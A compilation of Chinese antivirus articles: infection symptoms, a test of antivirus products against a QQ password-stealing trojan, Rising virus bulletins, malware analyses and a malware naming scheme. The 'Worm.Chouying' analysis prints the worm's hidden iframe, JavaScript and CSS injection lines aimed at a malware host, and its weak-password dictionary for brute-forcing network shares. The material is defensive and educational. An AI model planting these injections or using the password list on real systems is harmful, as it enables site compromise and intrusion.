反病毒小知识:如何快速准确判断你的电脑是否中毒
    经常死机：病毒打开了许多文件或占用了大量内存；不稳定（如内存质量差，硬件超频性能差等）；运行了大容量的软件占用了大量的内存和磁盘空间；使用了一些测试软件（有许多BUG）；硬盘空间不够等等；运行网络上的软件时经常死机也许是由于网络速度太慢，所运行的程序太大，或者自己的工作站硬件配置太低。

　　系统无法启动：病毒修改了硬盘的引导信息 ，或删除了某些启动文件。如引导型病毒 引导文件损坏；硬盘损坏或参数设置不正确；系统文件人为地误删除等。

　　文件打不开：病毒修改了文件格式；病毒修改了文件链接位置。文件损坏；硬盘损坏；文件快捷方式对应的链接位置发生了变化；原来编辑文件的软件删除了；如果是在局域网中多表现为服务器中文件存放位置发生了变化，而工作站没有及时涮新服器的内容（长时间打开了资源管理器）。

　　经常报告内存不够： 病毒非法占用了大量内存；打开了大量的软件；运行了需内存资源的软件；系统配置不正确；内存本就不够（目前基本内存要求为128M）等。

　　提示硬盘空间不够：病毒复制了大量的病毒文件（这个遇到过好几例，有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了，一安装软件就提示硬盘空间不够。硬盘每个分区容量太小；安装了大量的大容量软件；所有软件都集中安装在一个分区之中；硬盘本身就小；如果是在局域网中系统管理员为每个用户设置了工作站用户的“私人盘”使用空间限制，因查看的是整个网络盘的大小，其实“私人盘”上容量已用完了。

　　软盘等设备未访问时出读写信号：病毒感染；软盘取走了还在打开曾经在软盘中打开过的文件。

　　出现大量来历不明的文件：病毒复制文件；可能是一些软件安装中产生的临时文件；也或许是一些软件的配置信息及运行记录。

　　启动黑屏：病毒感染（记得最深的是98年的4.26，我为CIH付出了好几千元的代价，那天我第一次开机到了Windows画面就死机了，第二次再开机就什么也没有了）；显示器故障；显示卡故障；主板故障；超频过度；CPU损坏等等

　　数据丢失：病毒删除了文件；硬盘扇区损坏；因恢复文件而覆盖原文件；如果是在网络上的文件，也可能是由于其它用户误删除了。

　　键盘或鼠标无端地锁死：病毒作怪，特别要留意“木马”；键盘或鼠标损坏；主板上键盘或鼠标接口损坏；运行了某个键盘或鼠标锁定程序，所运行的程序太大，长时间系统很忙，表现出按键盘或鼠标不起作用。

　　系统运行速度慢：病毒占用了内存和CPU资源，在后台运行了大量非法操作；硬件配置低；打开的程序太多或太大；系统配置不正确；如果是运行网络上的程序时多数是由于你的机器配置太低造成，也有可能是此时网路上正忙，有许多用户同时打开一个程序；还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。

　　系统自动执行操作：病毒在后台执行非法操作；用户在注册表或启动组中设置了有关程序的自动运行；某些软件安装或升级后需自动重启系统。

　　有了病毒的一些基本知识后现在我们就可以来检查你的电脑中是否含有病毒现在病毒种类是越来越多，隐蔽的手段也越来越高明，所以给查杀病毒带来了新的难度。但随着计算机程序开发语言的技术性提高、计算机网络越来越普及，病毒的开发和传播是越来越容易了，因而安装反病毒软件是非常有必要的事。

暴力测试看效果：谁家杀毒软件可防止QQ密码被盗(1)
国内杀毒软件的测试环境　　
    国内三家杀毒软件都在年底推出了自己的2006版新品，并且都说自己能够查杀木马，有隐私保护功能保证密码不会被盗。到底这几家的密码防盗如何，让我们进行个暴力测试看看实际效果。

    既然是暴力测试，就一定得找个真家伙，我用的是一个盗QQ的木马。他运行以后会记录用户的QQ密码，然后把信息加密保存在系统目录下面（文件名为recinfo.dll），然后再通过邮件发出去。

    测试环境：Athlon 64 3000+、1GB内存、Win2000 SP4中文版、裸机测试

    为了测试公平，每测试完一个软件都用Ghost重新恢复系统，并且不开启杀毒软件的监控，只使用隐私保护功能。

    没有安装任何的杀毒软件和防火墙进行测试，为了防止密码被发送出去，测试过程中先拔掉了网线。

    运行木马，然后打开QQ，输入号码和密码。木马会记录密码，然后在system32目录下生成“recinfo.dll”。

　　
 

    文件可以用记事本打开，里面记录的应该就是QQ号码和密码的信息了。　　

    一旦连通网络以后，这个文件的内容会自动通过邮件发出去，并且会删除这个文件。

　　

暴力测试看效果：谁家杀毒软件可防止QQ密码被盗(2)
瑞星2006木马墙成功拦截

　瑞星2006　　



　瑞星今年产品的主打卖点之一是“木马墙”密码防盗，在测试中确实发现他和其他的杀毒软件不太一样。这个功能在个人防火墙2006中，所以测试的时候没有安装它的杀毒软件。 它不需要事先把密码什么的录入进去，在防火墙的游戏保护里把QQ加进去就OK了。






　然后运行病毒程序再启动QQ，瑞星个人防火墙立即提示检测到QQ正在运行。





　退出QQ后，在System32目录下也 没有生成记录密码的文件。




　

　同时，瑞星的防火墙提示有进程访问QQ，点击详情以后可以看到是哪些程序要访问QQ的进程。

　其中Sysapis.dll文件就是病毒释放的。　　

　感觉瑞星06的木马墙防盗功能确实不错，要是说明书写得再清楚点就好了，我琢磨了半天才知道木马墙原来在游戏保护里面...









一起评测的其他两家软件：一个一声不吭 默默被虐，一个象哑巴一样不能报警。密码都没有被保护住。

　整个测试完毕，感觉瑞星2006确实是下功夫了，木马墙效果确实不错，防火墙比以前强大了不少，杀毒软件也不像05那么占内存了。

瑞星公司04月01日发布 每日计算机病毒及木马播报
    据瑞星全球反病毒监测网介绍，今日有一个病毒特别值得注意，它是：“威金蠕虫变种QP（Worm.Viking.qp）”病毒。该病毒集文件型病毒、蠕虫病毒、病毒下载器于一身，传播能力非常强。该病毒会破坏用户的一些软件，造成它们无法使用。

本日热门病毒：

　　“威金蠕虫变种QP（Worm.Viking.qp）”病毒：警惕程度★★★☆，蠕虫病毒，通过感染文件、局域网以及其它病毒下载传播，依赖系统：WIN9X/NT/2000/XP。

　　它会感染Windows可执行文件，并会查找局域网中的所有共享计算机，尝试猜解它们的密码，试图感染这些计算机。该病毒还会自动在后台下载并运行“QQ通行证”等其它病毒，窃取用户QQ及网络游戏的账号和密码并发送给黑客。由于该病毒在编写上存在一些问题，可造成一些用户的软件被破坏，无法使用。目前，不少杀毒软件仅能对染毒文件进行删除处理，造成用户的文件丢失。瑞星杀毒软件2007版可以清除掉染毒文件中的病毒，并将这些文件恢复成正常状态。

　　反病毒专家建议电脑用户采取以下措施预防该病毒：1、建立良好的安全习惯，不打开可疑邮件和可疑网站；2、很多病毒利用漏洞传播，一定要及时给系统打补丁；3、安装专业的防毒软件升级到最新版本，并打开实时监控程序；4、安装带有“木马墙”功能的个人防火墙软件，防止密码丢失。5、登陆http://tool.ikaka.com下载并安装免费的瑞星卡卡3.2，并开启“IE防漏墙”功能，防止病毒通过IE漏洞侵入计算机。

　　如遇病毒，请拨打反病毒急救电话：010-82678800。能够上网的用户可以访问瑞星反病毒资讯网：http://www.rising.com.cn或登录http://help.rising.com.cn使用在线专家门诊进行免费咨询。

“MSN 照片”病毒疯狂传播 已经有数百台电脑中招
    【快讯】3月27日，瑞星截获一个通过MSN软件传播的后门病毒，并命名为“MSN照片（Worm.IRC.MyPhoto.a）”。瑞星反病毒专家介绍说，感染该病毒之后，中毒电脑会自动向MSN好友发送英文消息，并试图传送名为“photo album.zip”的压缩文件，用户打开压缩包中的文件后就会中毒。

    该病毒利用MSN向外发送病毒文件，大量消耗系统资源和网络带宽，因此对个人电脑还是企业局域网都有很大影响。同时它还会在中毒电脑里开置后门，窃取个人资料，从而使用户面临更多的安全威胁。目前已有数百用户向瑞星求助，瑞星客户服务中心的专家认为，该病毒的传播速度会继续增快，感染用户数可能会呈几何级数增长。




    据瑞星反病毒专家介绍，此病毒与两年前肆虐一时的“MSN性感烤鸡”病毒极其相似。由于MSN软件相对安全，使得很多用户对于MSN类病毒缺乏警惕，这也使得“MSN照片”、“性感烤鸡”等病毒传播速度快、感染范围广。

    瑞星技术部门对该病毒的分析表明，中毒用户会向MSN好友发送“Hey wanna see my new photo album?（嘿，想看看我的新照片集吗？）”、“hey you got a photo album? anyways heres my new photo album :) accept k?（嘿，收到我的新照片没有？这是我的新照片，收一下！）”等英文消息，并会传送“photo album.zip”压缩文件。如果用户接收并运行该文件，就会中毒。

    瑞星反病毒专家提醒广大网民，针对“MSN照片”病毒，用户应采取如下措施：不要轻易通过MSN接收和运行陌生文件；尽快更新自己的杀毒软件版本，瑞星杀毒软件19.16.12版本可以彻底清除此病毒。

瑞星最新病毒分析报告："Win32.Miser.a(吝啬鬼)"
病毒运行后有以下行为：

    1. 病毒在C:\ Program Files\Internet Explorer\目录下生成两个文件，文件名为IEXPL0RE.EXE和WebTime.exe，并把文件属性设置为隐藏。这两个文件均为病毒，病毒名分别为”Trojan.Mnless.fz”、”Trojan.DL.Agent.gys”

    2. 添加注册表项以下键值，以达到其自启动的目的：
HKEY_LOCAL_MACHINE \SOFTWARE\\Microsoft\Windows\CurrentVersion\Run
数据项名：”IgfxTray”
数据值为” C:\Program Files\Internet Explorer\IEXPL0RE.EXE”

    3. 将WebTime.exe注册为服务程序，使其可以每次开机时运行。

    4. 感染D、 E、 F、 G、 H、 I、盘下扩展名为”.EXE”的文件，并在被感染目录下生成desktop.ini文件作为该目录已经感染的标记，desktop.ini文件中记录病毒感染的时间。被感染文件图标被改为斗地主游戏主程序的图标，如图：






    5. 关闭包含以下字符串的窗口：
“internet explorer”、“收藏”、“主页”、“服务器正在”、“错误”、“.wmf”、“安全”、“rror”、“内存”、“.bat”、“.com”、“.exe”   

    6. 每隔30s删除IE的Cookies文件。   

    7. 使用IE打开”http://219.232.224.126/ind2.htm”网页。

    8. 显示QQ新斗地主刷分王V2008对话框，以迷惑用户，让用户以为这是一个正常软件。

瑞星最新病毒分析报告：“Worm.Chouying（仇英）”



    病毒使用Delphi编写，Upack压缩。运行后将在%SYSTEM%目录下复制一份病毒本体文件，文件名为” Lying.exe”。病毒主程序(.exe)文件的主要功能是释放病毒动态库文件”Lying.dll”，并且该动态加载运行。病毒的主要功能代码都集中在这个动态库文件中。

该病毒的主要行为：

    一、将病毒动态库文件”Lying.dll”加载到explorer.exe,services.exe,winlogon.exe三个进程中。

    二、感染文件扩展名为".EXE"、".SCR"、".PIF"、".COM"、".BAT"的PE文件，感染的方式是将被感染文件作为文件的附加数据添加在病毒文件的尾部，将修改感染文件的图标资源使其图标与被感染文件一致。

    三、修改文件扩展名为".HTM"、".HTML"、".ASP"、".ASPX"、".ASA"、".CDX"、".CER"、".PHP"、".JSP"、".INC"的文件，在文件尾部添加以下内容：
<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

    四、修改文件扩展名为".JS"的文件，在文件尾部添加以下内容：
document.write(',27h,'<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;" frameborder="0"></iframe>);
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

    五、修改文件扩展名为" .CSS"的文件，在文件尾部添加以下内容：
body {background-image: url(javascript:document.write("<iframe src="http://www.0x145b.com/fuck.htm" width="0" height="0" style="overflow:hidden;backgroup-color:black;border:none;"frameborder="0"></iframe>"))}
(该网址并不存在，但是作者的目的很可能是通过包含漏洞的网页传播病毒)

    六、通过局域网共享目录进行传播，并且其具有猜测计算机的弱口令的功能，
病毒会猜测以下用户的口令：“Administrator”、“admin”、“Root”。
使用的密码字典为："root"、"Password"、"1234"、"12345"、"123456"、"1234567"、
"12345678"、"123456789"、"123321"、"654321"、"54321"、"4321"、"111111"、
"121212"、"123123"、"1234qwer"、"123abc"、"000000"、"00000000"、
"11111111"、"88888888"、"88888"、"pass"、"passwd"、"database"、
"abcd"、"abc123"、"oracle"、"sybase"、"123qwe"、"server"、
"computer"、"internet"、"super"、"123asd"、"ihavenopass"、
"godblessyou"、"enable"、"2004"、"2005"、"2006"、"2007"、
"2008"、"test123"、"admin123"、"wangba"、"user"、"users"、
"abcd123"、"asdf"、"asdf123"、"windows"、"windows2000"、
"windowsxp"、"windows2003"、"window"、"love"、"iloveyou"、
"loveyou"、"test"、"temp"、"hao123"、"adsl"、"kaonima"、
"happy"、"login"、"home"、"mylove"、"guest"、"data"、"date"、
"mypass"、"mypass123"、"fuck"、"cctv"、"live"、"zxcv"、"fuckyou"、
"999999"、"foobar"、"china"、"japan"、"temp123"、"yxcv"、
"guest123"、"guest321"、"5201314"、"5021314"、"ghost"、
"goodbye"、"byebye"、"520520"。

    七、下载http://www.0x145b.com/Lying.ini这个文件，然后根据文件内容再下载其中的文件到本地计算机运行。

与”熊猫烧香”病毒的异同

    与”熊猫烧香”病毒的相同点为：
    1) 病毒的目的以及其作用相同，都是为了经济利益协助传播其他病毒；

    2) 病毒的传播方式相同，同样是通过感染可执行文件、包含漏洞的网页、网络共享目录进行传播；

    与”熊猫烧香”病毒的相同点为：
    1) 感染文件的手段更隐蔽，”熊猫烧香”病毒感染文件后有很明显的现象，即：被感染的文件的图标都变成了病毒的图标；“仇英”病毒感染文件后被感染的文件从外表上看不出什么变化。

    2) 修改的网页文件类型有所增加，加大了清除的难度。

    3) 病毒的执行形态有所变化，病毒的主要功能包含在病毒的动态库文件中，并且该动态库文件被加载系统进程当中，使得病毒的感染、传播、下载其他病毒的行为可以持续进行。

“仇英”病毒的传播情况，及发展趋势
    目前“仇英”病毒处于刚刚开始流传的阶段，并没开始大面积的传播，病毒传播的网址” http://www.0x145b.com”是虚假的，但是如果病毒的源代码被广泛流传，并且被不法分子利用，那么很可能又会造成与”熊猫烧香”病毒一样的后果。

“熊猫烧香”病毒变种传播情况
    到目前为止瑞星公司已经截获了107个”熊猫烧香”病毒的变种。

计算机通用病毒定义及命名规范详解 

　　病毒名是由以下6字段组成的：主行为类型.子行为类型.宿主文件类型.主名称.版本信息.主名称变种号#附属名称.附属名称变种号.病毒长度。其中字段之间使用“.”分隔，#号以后属于内部信息，为推举结构。

主行为类型与病毒子行为类型

　　病毒可能包含多个主行为类型，这种情况可以通过每种主行为类型的危害级别确定危害级别最高的作为病毒的主行为类型。同样的，病毒也可能包含多个子行为类型，这种情况可以通过每种主行为类型的危害级别确定危害级别最高的作为病毒的子行为类型。其中危害级别是指对病毒所在计算机的危害。

　　病毒主行为类型有是否显示的属性，用于生成病毒名时隐藏主行为名称。它与病毒子行为类型存在对应关系，见下表：

主行为类型 子行为类型
Backdoor
危害级别：1
说明：
中文名称—“后门”， 是指在用户不知道也不允许的情况下，在被感染的系统上以隐蔽的方式运行可以对被感染的系统进行远程控制，而且用户无法通过正常的方法禁止其运行。“后门”其实是木马的一种特例，它们之间的区别在于“后门”可以对被感染的系统进行远程控制（如：文件管理、进程控制等）。
 

Worm
危害级别：2
说明：
中文名称—“蠕虫”，是指利用系统的漏洞、外发邮件、共享目录、可传输文件的软件（如：MSN、OICQ、IRC等）、可移动存储介质（如：U盘、软盘），这些方式传播自己的病毒。这种类型的病毒其子型行为类型用于表示病毒所使用的传播方式。
Mail
危害级别：1
说明：通过邮件传播

IM
危害级别：2
说明：通过某个不明确的载体或多个明确的载体传播自己

MSN
危害级别：3
说明：通过MSN传播

QQ
危害级别：4
说明：通过OICQ传播

ICQ
危害级别：5
说明：通过ICQ传播

P2P
危害级别：6
说明：通过P2P软件传播

IRC
危害级别：7
说明：通过ICR传播

说明：不依赖其他软件进行传播的传播方式，如：利用系统漏洞、共享目录、可移动存储介质。

Trojan
危害级别：3
说明：
中文名称—“木马”，是指在用户不知道也不允许的情况下，在被感染的系统上以隐蔽的方式运行，而且用户无法通过正常的方法禁止其运行。这种病毒通常都有利益目的，它的利益目的也就是这种病毒的子行为。
Spy
危害级别：1
说明：窃取用户信息（如：文件等）

PSW
危害级别：2
说明：具有窃取密码的行为

DL
危害级别：3
说明：下载病毒并运行
一、判定条款:
没有可调出的任何界面,逻辑功能为:从某网站上下载文件加载或运行.
二、逻辑条件引发的事件:
事件1、.不能正常下载或下载的文件不能判定为病毒。
操作准则:该文件不能符合正常软件功能组件标识条款的,确定为:Trojan.DL
事件2.下载的文件是病毒
操作准则: 下载的文件是病毒,确定为: Trojan.DL

IMMSG
危害级别：4
说明：通过某个不明确的载体或多个明确的载体传播即时消息（这一行为与蠕虫的传播行为不同，蠕虫是传播病毒自己，木马仅仅是传播消息）

MSNMSG
危害级别：5
说明：通过MSN传播即时消息

QQMSG
危害级别：6
说明：通过OICQ传播即时消息

ICQMSG
危害级别：7
说明：通过ICQ传播即时消息

UCMSG
危害级别：8
说明：通过UC传播即时消息

Proxy
危害级别：9
说明：将被感染的计算机作为代理服务器

Clicker
危害级别：10
说明：点击指定的网页
判定条款:
没有可调出的任何界面,逻辑功能为:点击某网页。
操作准则:
该文件不符合正常软件功能组件标识条款的,确定为:Trojan.Clicker。
(该文件符合正常软件功能组件标识条款,就参考流氓软件判定规则进行流氓软件判定)

Dialer
危害级别：12
说明：通过拨号来骗取Money的程序

说明：无法描述其利益目的但又符合木马病毒的基本特征，则不用具体的子行为进行描述

AOL
按照原来病毒名命名保留。

Notifier
按照原来病毒名命名保留。

Virus
危害级别：4
说明：中文名称—“感染型病毒”，是指将病毒代码附加到被感染的宿主文件（如：PE文件、DOS下的COM文件、VBS文件、具有可运行宏的文件）中，使病毒代码在被感染宿主文件运行时取得运行权的病毒。
 

Harm
危害级别：5
说明：中文名称—“破坏性程序”，是指那些不会传播也不感染，运行后直接破坏本地计算机（如：格式化硬盘、大量删除文件等）导致本地计算机无法正常使用的程序。
 

Dropper
危害级别：6
说明：中文名称—“释放病毒的程序”，是指不属于正常的安装或自解压程序，并且运行后释放病毒并将它们运行。
一．Dropper判定条款:
没有可调出的任何界面，逻辑功能为:自释放文件加载或运行。

二．逻辑条件引发的事件:
事件1：.释放的文件不是病毒。
操作准则: 释放的文件和释放者本身没逻辑关系并该文件不符合正常软件功能组件标识条款的,确定为:Droper
事件2：释放的文件是病毒。
操作准则: 释放的文件是病毒，确定该文件为:Droper

Hack
危害级别：无
说明：中文名称—“黑客工具”，是指可以在本地计算机通过网络攻击其他计算机的工具。
Exploit
说明：漏洞探测攻击工具

DDoser
说明：拒绝服务攻击工具

Flooder
说明：洪水攻击工具

说明：不能明确攻击方式并与黑客相关的软件，则不用具体的子行为进行描述

Spam
说明：垃圾邮件。

Nuker

Sniffer

Spoofer

Anti
说明：免杀的黑客工具

Binder
危害级别：无
说明：捆绑病毒的工具
 


　　正常软件功能组件标识条款：被检查的文件体内有以下信息能标识出该文件是正常软件的功能组件：文件版本信息,软件信息（注册表键值、安装目录）等。

宿主文件

　　宿主文件是指病毒所使用的文件类型，有是否显示的属性。目前的宿主文件有以下几种。　

JS 说明：JavaScript脚本文件
VBS 说明：VBScript脚本文件
HTML 说明：HTML文件
Java 说明：Java的Class文件
COM 说明：Dos下的Com文件
EXE 说明：Dos下的Exe文件
Boot 说明：硬盘或软盘引导区
Word 说明：MS公司的Word文件
Excel 说明：MS公司的Excel文件
PE 说明：PE文件
WinREG 说明：注册表文件
Ruby 说明：一种脚本
Python 说明：一种脚本
BAT 说明：BAT脚本文件
IRC 说明：IRC脚本

主名称

　　病毒的主名称是由分析员根据病毒体的特征字符串、特定行为或者所使用的编译平台来定的，如果无法确定则可以用字符串”Agent”来代替主名称，小于10k大小的文件可以命名为“Samll”。

版本信息

　　版本信息只允许为数字，对于版本信息不明确的不加版本信息。

主名称变种号

　　如果病毒的主行为类型、行为类型、宿主文件类型、主名称均相同，则认为是同一家族的病毒，这时需要变种号来区分不同的病毒记录。如果一位版本号不够用则最多可以扩展3位，并且都均为小写字母a—z，如：aa、ab、aaa、aab以此类推。由系统自动计算，不需要人工输入或选择。

附属名称

　　病毒所使用的有辅助功能的可运行的文件，通常也作为病毒添加到病毒库中，这种类型的病毒记录需要附属名称来与病毒主体的病毒记录进行区分。附属名称目前有以下几种：

Client 说明：后门程序的控制端
KEY_HOOK 说明：用于挂接键盘的模块
API_HOOK 说明：用于挂接API的模块
Install 说明：用于安装病毒的模块
Dll 说明：文件为动态库，并且包含多种功能
（空） 说明：没有附属名称，这条记录是病毒主体记录

附属名称变种号

　　如果病毒的主行为类型、行为类型、宿主文件类型、主名称、主名称变种号、附属名称均相同，则认为是同一家族的病毒，这时需要变种号来区分不同的病毒记录。变种号为不写字母a—z，如果一位版本号不够用则最多可以扩展3位，如：aa、ab、aaa、aab以此类推。由系统自动计算，不需要人工输入或选择。

病毒长度

　　病毒长度字段只用于主行为类型为感染型（Virus）的病毒，字段的值为数字。字段值为0，表示病毒长度可变。

病毒疫情等级描述

病毒疫情等级用四种颜色表示，分别为：绿色、黄色、橙色和红色。四种颜色中绿色级别最低，红色为最高，它们的具体含义如下：


正常  绿色：目前网络较安全，用户只需要进行日常的杀毒软件升级，并打开杀毒软件的实时监控功能即可。
警惕  黄色：目前网络中存在一定数量的病毒，用户需要实时地升级杀毒软件进行防范，并打开杀毒软件的实时监控功能。
危险  橙色：目前网络中病毒情况较为严重，用户需要实时升级杀毒软件并打开杀毒软件的实时监控功能进行防范，并使用杀毒软件进行全盘扫描。
高危  红色：目前网络中病毒情况为高度危险，用户不仅需要实时升级杀毒软件并打开杀毒软件的实时监控功能、使用杀毒软件进行全盘扫描，还应时刻关注杀毒软件厂商发布的安全信息，做好防卫工作。

计算机病毒怎样入侵你的计算机

一般计算机病毒的入侵都是有一定的规律性的，计算机病毒常用以下几种方式入侵我们的计算机：

利用操作系统漏洞传播病毒 利用操作系统存在的安全漏洞来进行攻击你的计算机，比如冲击波，震荡波。例如您的计算机感染冲击波病毒后，计算机就会弹出一个对话框，提示“您的计算机将在 1分钟内关闭”，然后便开始 1分钟倒计时，计时完毕后您的计算机就会自动关闭。
通过电子邮件传播病毒 通过电子邮件传播病毒也是比较常见的一种病毒传播方式。通常会有 邮件会以提示中奖，免费下载等诱人消息提示的方式诱骗用户打开邮件附件或带有病毒的网站，以达到使病毒入侵计算机的目的。最常见的就是病毒发送大量垃圾邮件，造成企业邮件服务器瘫痪，网速减慢。有些病毒还会删除系统文件，篡改系统注册表，导致计算机不能正常工作。
通过网站下载传播病毒 通常会有一些提供音乐，视频等点击率较高的网站，或提供色情，反动宣传资料下载等不健康网站中被病毒传播者们利用，利用这些点击率较高的网页来达到更好的病毒传播目的。

通过即时通讯工具传播病毒
有很多木马病毒，较为常见的如：“ QQ尾巴”病毒都是通过OICQ来传播的。常见的就是当你感染病毒后，在你用OICQ， ICQ，MSN等工具给对方发送一条信息的时候，系统会自动的给对方发送一条有病毒潜伏的网页地址，或发送一个文件。而你却看不到这条信息，对方点击此链接地址，或打开运行此文件时，很可能就会被感染。
通过感染文件传播 CIH 、Funlove等病毒都是通过感染Windows可执行文件（PE格式文件）进行传播，通常被这类病毒感染的系统运行会比较缓慢，并且一些大的自解压缩文件也可能被这种病毒破坏而无法打开。
通过其他方式进行感染 如通过引导区、移动存储设备等进行传播。